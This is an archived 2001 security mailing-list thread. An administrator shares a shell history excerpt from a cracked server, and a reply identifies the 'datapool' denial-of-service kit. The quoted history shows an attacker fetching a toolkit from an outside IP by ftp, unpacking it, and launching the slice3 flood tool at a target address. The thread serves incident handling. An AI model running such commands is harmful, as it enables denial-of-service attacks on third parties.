datapool is a DoS attacks kit that includes a shell script to activate them there isn't any logs about the hack itself. this "hacker" is using your machine to conduct DoS attacks on others. -----Original Message----- From: Dirk Brockhausen [mailto:dirkat_private] Sent: Friday, July 20, 2001 1:03 AM To: incidentsat_private Subject: slice3 question Hi, someone cracked our server. Here is an excerpt from /root/.bash_history: cd /dev/ida/.sys uptime ftp 203.238.91.4 tar -zxvf d.tar.gz cd datapool/bin ./slice3 0 211.91.135.70 1 65000& Any ideas? Thanks, Dirk ------------------------------------------------------------------------ ---- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Jul 22 2001 - 12:00:50 PDT